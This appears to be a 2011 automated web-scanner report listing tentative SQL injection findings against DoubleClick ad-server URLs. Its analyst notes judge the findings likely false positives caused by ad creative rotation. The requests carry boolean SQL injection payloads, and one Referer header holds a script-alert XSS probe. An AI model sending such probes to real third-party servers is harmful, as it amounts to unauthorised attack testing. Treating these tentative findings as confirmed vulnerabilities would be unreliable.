<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732014/direct/01/rnd=2050074284/rnd=2050074284?click=http://ad.amgdgt.com/ads/t=c/s=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--/clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUY1Hkw5VHgyhvrSCoNeyiAbFdTk9nZW8sdXNhLHQsMTMwNTAzNDk2MjQ0MixjLDI4OTY3MCxwYyw2OTExMSxhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQVVBZmhldFJ1QjRCUUFBQUFLQ1ptUWxBbXBtWm1abVpDVUNhbVptWm1aa0pRRkZGSGxUV1BORU1Tc1lkYTZiMnppVTdPc2xOQUFBQUFCVWJBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0MxR0hJQVBoQUJBZ1VDQUFRQUFBQUFQQ0V2bUFBQUFBQS4vY25kPSFrUjdnZVFpX2tBTVF5TWtLR0FBZzBjY0JNQUE0dFRGQUFFaVdCVkFBV0FCZzJnRm9BSENzQW5qOFc0QUI5Z1NJQWFRVWtBRUJtQUVCb0FFRHFBRURzQUVCdVFFQUFBQ2dtWmtKUU1FQkFBQUFvSm1aQ1VESkFiamRRcENzejdrXzBBRUEvcmVmZXJyZX
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, which the scanner takes as an indication that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the payload is appended after ord=0619192936 at the end of the ;-separated path rather than inside sz=728x90 itself, and the two responses simply serve different creatives for the same placement (lmb_iau_..._Born_0311_728x90.swf versus lmb_iau_..._Accid3Yr_0510_728x90.swf, Content-Length 3966 versus 4017, both clicking through to insurance.lowermybills.com). Creative rotation is ordinary ad-server behaviour and would produce this difference between any two requests; repeat the unmodified request to establish whether the baseline itself varies before treating this as SQL injection.

Request 1

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=0619192936'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:17:56 GMT
Content-Length: 3966

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Born_0311_728x90.swf";
var gif = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Born_0311_728x90.gif";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/17/25/%2a/h%3B220264224%3B4-0%3B0%3B43807788%3B3454-728/90%3B41050720/41068507/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807788-220264224-41068507");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 728;
var winH = 90;
var winL = 0;
var winT = 0;
if(typeof(encodeURIComponent)=="function"){url=encodeURIComponent(unescape(url));}
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');if((openWindow=="center")&&window.screen){winL=Math.floor((screen.availWidth-winW)/2);winT=Math.floor((screen.availHeight-winH)/2);}window.open(unescape(url),id,"width="+winW+",height="+winH+",top="+winT+",left="+winL+",status=no,toolbar=no,menubar=no,location=no");}this.FSWin = FSWin;
ua=navigator.userAgent;
if(minV<=pVM&&(openWindow=="false"||(ua.indexOf("Mac")<0&&ua.indexOf("Opera")<0))){
   var adcode='<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="'+id+'"'+FWH+'>'+
       '<param name="movie" value="'+swf+'"><param name="flashvars" value='+fv+'><param name="quality" value="high"><param name="wmode" value="'+wmode+'"><param name="base" value="'+swf.substring(0,swf.lastIndexOf("/"))+'"><PARAM NAME="AllowScriptAccess" VALUE="'+dcallowscriptaccess+'">'+bgo+
       '<embed src="'+swf+'" flashvars='+fv+bge+FWH+' type="application/x-shockwave-flash" quality="high" swliveconnect="true" wmode="'+wmode+'" name="'+id+'" base="'+swf.substring(0,swf.lastIndexOf("/"))+'" AllowScriptAccess="'+dcallowscriptaccess+'"></embed></object>';
if((
...[SNIP]...

Request 2

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=0619192936'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:17:57 GMT
Content-Length: 4017

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Accid3Yr_0510_728x90.swf";
var gif = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Accid3Yr_0510_728x90.gif";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/17/25/%2a/u%3B220264224%3B0-0%3B0%3B43807788%3B3454-728/90%3B36993209/37011087/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807788-220264224-37011087");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 728;
var winH = 90;
var winL = 0;
var winT = 0;
if(typeof(encodeURIComponent)=="function"){url=encodeURIComponent(unescape(url));}
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');if((openWindow=="center")&&window.screen){winL=Math.floor((screen.availWidth-winW)/2);winT=Math.floor((screen.availHeight-winH)/2);}window.open(unescape(url),id,"width="+winW+",height="+winH+",top="+winT+",left="+winL+",status=no,toolbar=no,menubar=no,location=no");}this.FSWin = FSWin;
ua=navigator.userAgent;
if(minV<=pVM&&(openWindow=="false"||(ua.indexOf("Mac")<0&&ua.indexOf("Opera")<0))){
   var adcode='<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="'+id+'"'+FWH+'>'+
       '<param name="movie" value="'+swf+'"><param name="flashvars" value='+fv+'><param name="quality" value="high"><param name="wmode" value="'+wmode+'"><param name="base" value="'+swf.substring(0,swf.lastIndexOf("/"))+'"><PARAM NAME="AllowScriptAccess" VALUE="'+dcallowscriptaccess+'">'+bgo+
       '<embed src="'+swf+'" flashvars='+fv+bge+FWH+' type="application/x-shockwave-flash" quality="high" swliveconnect="true" wmode="'+wmode+'" name="'+id+'" base="'+swf.substring(0,swf.lastIndexOf("/"))+'" AllowScriptAccess="'+dcallowscriptaccess
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, which the scanner takes as an indication that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the payload forms the name of an extra query-string parameter (1%20and%201%3d1--%20=1) that the ad server has no reason to read, and it carries no quote, so it could only matter in an unquoted numeric context. The two responses are different creative templates altogether: a 37981-byte DoubleClick rich-media template (RichMediaCore_59_07) and a 7028-byte DCFlash creative (MAPS_728x90.swf). That is consistent with creative rotation on the placement rather than with the parameter name reaching a database; repeat the unmodified request to see whether the baseline itself alternates between these templates.

Request 1

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:21:20 GMT
Content-Length: 37981

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers = new Object();
if(typeof(dartMotifAds) == "undefined")
var dartMotifAds = new Array();
if(!self.dartLoadedGlobalTemplates_59_07) {
self.dartLoadedGlobalTemplates_59_07 = {};
}
if(self.dartLoadedGlobalTemplates_59_07["@GT_TYPE@"]) {
self.dartLoadedGlobalTemplates_59_07["@GT_TYPE@"].isLoaded = true;
}

function RichMediaCore_59_07() {
this.CREATIVE_TYPE_EXPANDING = "ExpandingFlash";
this.CREATIVE_TYPE_FLOATING = "FloatingFlash";
this.CREATIVE_TYPE_INPAGE = "InpageFlash";
this.CREATIVE_TYPE_INPAGE_WITH_FLOATING = "InpageFlashFloatingFlash";
this.CREATIVE_TYPE_FLOATING_WITH_REMINDER = "FloatingFlashReminderFlash";
this.CREATIVE_TYPE_INPAGE_WITH_OVERLAY = "InpageFlashOverlayFlash";
this.ASSET_TYPE_FLOATING = "Floating";
this.ASSET_TYPE_INPAGE = "Inpage";
this.ASSET_TYPE_EXPANDING = "Expanding";
this.ASSET_TYPE_REMINDER = "Reminder";
this.ASSET_TYPE_OVERLAY = "Overlay";
this.STANDARD_EVENT_DISPLAY_TIMER = "DISPLAY_TIMER";
this.STANDARD_EVENT_INTERACTION_TIMER = "INTERACTION_TIMER";
this.STANDARD_EVENT_INTERACTIVE_IMPRESSION = "EVENT_USER_INTERACTION";
this.STANDARD_EVENT_FULL_SCREEN_VIDEO_PLAYS = "";
this.STANDARD_EVENT_FULL_SCREEN_VIDEO_COMPLETES = "";
this.STANDARD_EVENT_FULL_SCREEN_AVERAGE_VIEW_TIME = "";
this.STANDARD_EVENT_MANUAL_CLOSE = "EVENT_MANUAL_CLOSE";
this.STANDARD_EVENT_BACKUP_IMAGE = "BACKUP_IMAGE_IMPRESSION";
this.STANDARD_EVENT_EXPAND_TIMER = "EXPAND_TIMER";
this.STANDARD_EVENT_VIDEO_PLAY = "EVENT_VIDEO_PLAY";
this.STANDARD_EVENT_VIDEO_VIEW_TIMER = "EVENT_VIDEO_VIEW_TIMER";
this.STANDARD_EVENT_VIDEO_VIEW_COMPLETE = "EVENT_VIDEO_COMPLETE";
this.STANDARD_EVENT_VIDEO_INTERACTION = "EVENT_VIDEO_INTERACTION";
this.STANDARD_EVENT_VIDEO_PAUSE = "EVENT_VIDEO_PAUSE";
this.STANDARD_EVENT_VIDEO_MUTE = "E
...[SNIP]...

Request 2

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:21:21 GMT
Content-Length: 7028

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2493053/MAPS_728x90.swf";
var gif = "http://s0.2mdn.net/2493053/728x90_maps.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/1c8/%2a/n%3B235864053%3B2-0%3B0%3B59652986%3B3454-728/90%3B41213402/41231189/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/1c8/%2a/n%3B235864053%3B2-0%3B0%3B59652986%3B3454-728/90%3B41213402/41231189/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPs
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N6543.131803.TURN.COM/B5513576.10

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, which the scanner takes as an indication that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the payload is a trailing ;-separated path segment after the click=http://r.turn.com/.../url/ value, not part of sz=728x90, and the two responses again serve different creatives for the same placement (CRM_728x90_gardenclub_clorox_outdoor.swf versus CRM_728x90_GC_diginto_joingc.swf, Content-Length 6123 versus 6099, identical homedepotgardenclub.com click-through in both). As with 1.2, establish whether the unmodified request rotates creatives on its own before attributing the difference to the payload.

Request 1

GET /adi/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033?;click=http://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/;'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:59:29 GMT
Content-Length: 6123

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3076801/CRM_728x90_gardenclub_clorox_outdoor.swf";
var gif = "http://s0.2mdn.net/3076801/CRM_728x90_gardenclub_clorox_outdoor.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/j%3B241010695%3B1-0%3B0%3B63775632%3B3454-728/90%3B42072487/42090274/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/j%3B241010695%3B1-0%3B0%3B63775632%3B3454-728/90%3B42072487/42090274/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag1";
ctv[1] = "";
ctp[2] = "clickTAG";
ctv[2] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/j%3B241010695%3B1-0%3B0%3B63775632%3B3454-728/90%3B42072487/42090274/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/" + ctVal);
}
if(ctParam.toLowerCa
...[SNIP]...

Request 2

GET /adi/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033?;click=http://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/;'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:59:30 GMT
Content-Length: 6099

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3076801/CRM_728x90_GC_diginto_joingc.swf";
var gif = "http://s0.2mdn.net/3076801/CRM_728x90_GC_diginto_joingc.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/d%3B241010695%3B0-0%3B0%3B63775632%3B3454-728/90%3B42072486/42090273/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/d%3B241010695%3B0-0%3B0%3B63775632%3B3454-728/90%3B42072486/42090273/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag1";
ctv[1] = "";
ctp[2] = "clickTAG";
ctv[2] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/d%3B241010695%3B0-0%3B0%3B63775632%3B3454-728/90%3B42072486/42090273/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/" + ctVal);
}
if(ctParam.toLowerCase() == "clickta
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_eo parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/casio/cttech

Issue detail

The _eo parameter appears to be vulnerable to SQL injection attacks. The payloads 28613726'%20or%201%3d1--%20 and 28613726'%20or%201%3d2--%20 were each submitted in the _eo parameter. These two requests resulted in different responses, which the scanner takes as an indication that the input is being incorporated into a SQL query in an unsafe way.

